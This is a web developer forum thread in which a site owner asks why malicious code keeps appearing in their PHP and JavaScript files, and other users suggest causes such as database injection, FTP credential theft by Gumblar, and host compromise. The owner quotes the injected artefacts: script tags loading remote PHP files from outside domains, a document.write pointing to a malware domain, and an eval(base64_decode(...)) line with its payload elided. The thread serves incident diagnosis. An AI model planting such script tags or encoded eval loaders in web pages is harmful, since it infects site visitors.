www.webdeveloper.com
Results 1 to 8 of 8

Thread: [RESOLVED] Possible Javascript Injection

  1. #1
    Join Date
    Sep 2007
    Location
    INDIA
    Posts
    12

    resolved [RESOLVED] Possible Javascript Injection

    On uploading files (PHP and javascript) to the server from local machine via dreamweaver, Google Chrome reported the presence of malicious codes (like loto-49) inside the server page. Later when I checked, I found that a
    HTML Code:
    document.write('....loto-49.com....');
    was automatically added at the end of each javascript *.js files. On their removal, the warnings were gone.

    Recently, they again appeared. Between the closure of the head tag (</head>) and the start of the body tag(<body>) the following code is added automatically:
    HTML Code:
    <script src=http://hilalgroup.com/images/gifimg.php ></script> <script src=http://pianotainment.com/images/gifimg.php ></script>
    I checked the local files (both PHP and Javascript) and later downloaded the same from the server and re-checked them. But I couldn't find the possible cause or any occurences of the above script code snippet.

    Can anyone throw a light upon? My site is being blacklisted by Chrome.

  2. #2
    Join Date
    Mar 2007
    Posts
    946
    Could it be coming from the database that is if your site is using a database?

  3. #3
    Join Date
    Sep 2007
    Location
    INDIA
    Posts
    12
    I'm using a database indeed. But the portion where the code is inserted does not contain any database print. The code of the page is like:

    PHP Code:
    <?php require 'template/header.php'?>
    <title>The title</title>
    </head>
    [B][COLOR="DarkRed"](THE CODE IS INSERTED HERE)[/COLOR][/B]
    <body>
        <?php require 'template/top.php'?>
        <table class="bodytabidx">
        <tr>
        <td class="linktd">
            <?php require 'category_list.php'?>
        </td>
        <td class="cata_bodytd">
        <div id="disppro">
        <?php require 'product_display.php'?>
        </div>
        </td>
        </tr>
        </table>
        <?php
            
    require 'template/footer.php';
            
    mysql_close($conn);
        
    ?>
    </body>
    </html>

  4. #4
    Join Date
    Mar 2007
    Posts
    946
    Check to see if a user figured out a way to enter info into your database.

  5. #5
    Join Date
    Sep 2007
    Location
    INDIA
    Posts
    12
    But how (and from where) can it be injected in such a place where the actual code is clean (does not have any echo/print/document.write there)?

    Some more details of the error:

    http://safebrowsing.clients.google.c...hrome&hl=en-US
    Attached Images Attached Images

  6. #6
    Join Date
    Jan 2010
    Location
    Great Britian
    Posts
    21
    FTP could be another hack, Gumblar works on the princple that the file download offered (usually a pdf) is the infection point and what steals passwords and logins to FTP and then logs in, grabs the index page, modifies it and then uploads back to the server.

    (SO go now, change your login to your server, if that cures it, then consider moving all your development to a separate user account on your computer and keep one user account for web surfing, etc. Safest policy if you work on one machine but also surf from it)

    OR...

    check with the web host company that they have not done this or if the server has been compromised by a new client, etc. Poor back end security and a buggy PHP and SQL all go miles to helping the hackers.

    Check what PHP and SQL versions your running on. Your hosts running PHP < 5.0 then you possibly are being hacked through PHP itself from a known security bug that allows for server-side hacks to be made. MySQL is another technology that people will hack and inject data in to if they find hackable or exploitable PHP installs.

    So start asking questions of your host and if they have any server-side firewalls, I am not talking about what is on the outside but internals, do they have a firewall policy between servers and networks connected to them or are they an eggs in one basket host? (in it for the money)

  7. #7
    Join Date
    May 2003
    Location
    Between Baltimore and DC
    Posts
    3,579
    Tell you hosting provider about the problem and they should be able to help you figure it out.

    Eric

  8. #8
    Join Date
    Sep 2007
    Location
    INDIA
    Posts
    12
    Thanks for your response. Some extra code was added into some PHP files as:

    PHP Code:
    <?php eval(base64_decode('....'); ?>
    Again, a lot of thanks to you all for taking out your time and replying.

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
HTML5 Development Center



Recent Articles